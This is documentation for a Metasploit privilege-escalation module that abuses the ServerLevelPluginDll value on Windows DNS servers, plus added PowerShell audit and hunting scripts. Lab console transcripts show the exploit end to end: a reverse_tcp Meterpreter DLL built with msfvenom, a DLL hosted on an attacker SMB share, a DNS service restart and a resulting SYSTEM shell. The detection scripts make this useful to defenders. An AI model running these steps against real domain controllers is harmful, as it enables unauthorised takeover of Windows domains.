Introduction
This module exploits a feature of the DNS service on Windows Server. Members of the DnsAdmins group can use dnscmd.exe to set the
ServerLevelPluginDll registry value under HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\ so that it points to an arbitrary DLL.
Once the value is set, restarting the DNS service loads the DLL and executes its code, providing us with SYSTEM privileges.
Increasing WfsDelay is recommended when using a UNC path.
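The registry value and group membership described above are the two things a defender can check directly. The following audit script is an added example written for this page; it is not part of the Metasploit module. It assumes it is run elevated on the DNS server, that the ActiveDirectory module (RSAT) is available for the DnsAdmins enumeration (it is skipped otherwise), and the `-Remediate` and `-ExpectedDll` parameter names are my own.

```powershell
# Added audit script (not part of the Metasploit module). Run elevated on a
# Windows DNS server. Reports whether ServerLevelPluginDll is populated, who can
# set it (DnsAdmins members), and optionally clears it. Parameter names are my own.
[CmdletBinding()]
param(
    [switch]$Remediate,        # remove a populated ServerLevelPluginDll value
    [string]$ExpectedDll = ''  # path of a legitimately deployed plugin DLL, if any
)

$paramsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$valueName = 'ServerLevelPluginDll'

# 1. Read the value the module abuses. Absent or empty is the normal state.
$item = Get-ItemProperty -Path $paramsKey -Name $valueName -ErrorAction SilentlyContinue
$current = if ($item) { [string]$item.$valueName } else { '' }

if ([string]::IsNullOrWhiteSpace($current)) {
    Write-Output "[OK]   $valueName is not set."
} elseif ($ExpectedDll -and ($current -ieq $ExpectedDll)) {
    Write-Output "[OK]   $valueName points at the expected plugin: $current"
} else {
    Write-Output "[WARN] $valueName is set to: $current"
    if ($current -like '\\*') {
        Write-Output "       Value is a UNC path; the DNS service would load code from a remote share on its next start."
    }
    if ($Remediate) {
        # Removing the value is the same cleanup the module performs; the change
        # takes effect the next time the DNS service starts.
        Remove-ItemProperty -Path $paramsKey -Name $valueName -ErrorAction Stop
        Write-Output "       Value removed. Establish who set it before the DNS service is restarted."
    }
}

# 2. Enumerate DnsAdmins, because every member can set this value with dnscmd.exe.
if (Get-Module -ListAvailable -Name ActiveDirectory) {
    $members = @(Get-ADGroupMember -Identity 'DnsAdmins' -Recursive -ErrorAction SilentlyContinue)
    Write-Output "[INFO] DnsAdmins has $($members.Count) effective member(s):"
    foreach ($m in $members) {
        Write-Output ("       {0,-10} {1}" -f $m.objectClass, $m.SamAccountName)
    }
} else {
    Write-Output "[INFO] ActiveDirectory module not available; skipping DnsAdmins enumeration."
}

# 3. Show the service state so a pending restart (the trigger for loading the DLL)
#    is not missed during the review.
$svc = Get-Service -Name 'DNS' -ErrorAction SilentlyContinue
if ($svc) { Write-Output "[INFO] DNS service status: $($svc.Status)" }
```

Run it without switches for a read-only report; `-Remediate` only removes the value and does not restart the service, so the currently loaded DNS process is left for the responder to examine.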
Vulnerable Application
Windows Server 2003 and above
Verification Steps
- Get a Meterpreter shell
- `use exploit/windows/local/dnsadmin_serverlevelplugindll`
- `set PAYLOAD <payload>`. Payload architecture must be the same as the target system
- `set LHOST <lhost>`
- `set LPORT <lport>`
- `set SESSION <session_no>` to specify session
- `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
- `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or want to use a UNC path
- `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
- `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true`
Options
DLLNAME
Name of the DLL to use.
DLLPATH
Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:
- A working SMB2 share (use Impacket's `smbserver.py` to quickly set up one)
- A DLL of the same architecture as the target system
MAKEDLL
Just create the DLL, do not exploit.
Will create a DLL in the ~/.msf4/local directory if set to true.
Scenarios
Windows Server 2019 Standard x64, writing msf.dll to %TEMP%
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56312 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Building DLL...
[*] Writing DLL to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[*] Modifying ServerLevelPluginDll to point to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800
meterpreter >
[*] Erasing ServerLevelPluginDll registry value...
[*] Removing C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
meterpreter > sysinfo
Computer : DC01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : BASILISKCORP
Logged On Users : 16
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
The fastest way to get a share up and running is to use Impacket's smbserver:
msfdev2@automata-ng:~$ mkdir ~/test; sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ~/test
[sudo] password for msfdev2:
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
You can generate a DLL using the module by setting MAKEDLL to true:
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56307 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >
Once the DLL has been generated, copy it to the folder shared by Impacket's smbserver:
msfdev2@automata-ng:~$ cp /home/msfdev2/.msf4/local/test.dll ~/test/test.dll
msfdev2@automata-ng:~$
Alternatively, you can generate a DLL using msfvenom:
msfdev2@automata-ng:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o ~/test/test.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
Saved as: /home/msfdev2/test/test.dll
msfdev2@automata-ng:~$
After that, proceed with the actual exploit:
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
MAKEDLL => false
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
DLLPATH => \\192.168.137.139\test
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Using user-provided UNC path.
[*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56493) at 2020-05-16 03:45:09 +0800
meterpreter > sysinfo
Computer : DC01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : BASILISKCORP
Logged On Users : 18
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows Server 2019 Standard x64, just creating DLL
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56478 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >
Notes
- This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.
- The service will crash if the DLL used does not contain the right exports, so using the msfvenom-generated DLL will definitely cause it to crash.
- Automatic cleanup of the dropped DLL is attempted if the DLL has been written to disk, but if automatic cleanup fails manual cleanup may be necessary.
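The notes above list the artifacts this module leaves: a registry write, a DLL on disk or on a share, and the service stop/start. The following hunting script is an added example written for this page and is not part of the module. It assumes it is run elevated on the DNS server, that the Sysmon channel may be absent (those checks are then skipped), and that Security event 4657 only appears when a SACL audits writes to the DNS Parameters key; the `-Hours` parameter and the `Get-EventsSafe` helper are my own.

```powershell
# Added hunting script (not part of the Metasploit module). Correlates the
# artifacts the module generates on the DNS server over the last N hours.
# Assumptions: run elevated; Sysmon is optional; Security 4657 needs a SACL on
# the key. Helper and parameter names are my own.
param([int]$Hours = 24)

$since  = (Get-Date).AddHours(-$Hours)
$marker = 'ServerLevelPluginDll'

function Get-EventsSafe {
    # Wrapper so a missing channel or an empty result does not abort the hunt.
    param([hashtable]$Filter)
    $Filter['StartTime'] = $since
    Get-WinEvent -FilterHashtable $Filter -ErrorAction SilentlyContinue
}

$findings = @()

# 1. Registry write to the value the module sets, as recorded by Sysmon (Event 13).
foreach ($e in (Get-EventsSafe -Filter @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 } |
                Where-Object { $_.Message -match $marker })) {
    $details = if ($e.Message -match 'Details:\s*(.+)') { $Matches[1].Trim() } else { '?' }
    $findings += [pscustomobject]@{ Time = $e.TimeCreated; Source = 'Sysmon 13'; Detail = "$marker set to $details" }
}

# 2. The same write seen through Security auditing (Event 4657); requires a SACL on the key.
foreach ($e in (Get-EventsSafe -Filter @{ LogName = 'Security'; Id = 4657 } |
                Where-Object { $_.Message -match $marker })) {
    $findings += [pscustomobject]@{ Time = $e.TimeCreated; Source = 'Security 4657'; Detail = "$marker modified" }
}

# 3. DNS Server service state changes (SCM 7036): the restart is what loads the DLL.
foreach ($e in (Get-EventsSafe -Filter @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036 } |
                Where-Object { $_.Message -like '*DNS Server*' })) {
    $findings += [pscustomobject]@{ Time = $e.TimeCreated; Source = 'SCM 7036'; Detail = ($e.Message -split "`n")[0].Trim() }
}

# 4. Sysmon 7: a module loaded into dns.exe from outside System32 (for example %TEMP% or a UNC path).
foreach ($e in (Get-EventsSafe -Filter @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } |
                Where-Object { $_.Message -match 'Image:\s*.*\\dns\.exe' })) {
    if ($e.Message -match 'ImageLoaded:\s*(.+)') {
        $loaded = $Matches[1].Trim()
        if ($loaded -notlike "$env:SystemRoot\System32\*") {
            $findings += [pscustomobject]@{ Time = $e.TimeCreated; Source = 'Sysmon 7'; Detail = "dns.exe loaded $loaded" }
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No $marker-related activity found in the last $Hours hour(s)."
} else {
    $findings | Sort-Object Time | Format-Table -AutoSize
}
```

A registry write to ServerLevelPluginDll followed within minutes by a DNS Server stop/start and a non-System32 image load in dns.exe is the sequence the scenarios above produce; any one of the four on its own is worth a look, the combination is the module's footprint.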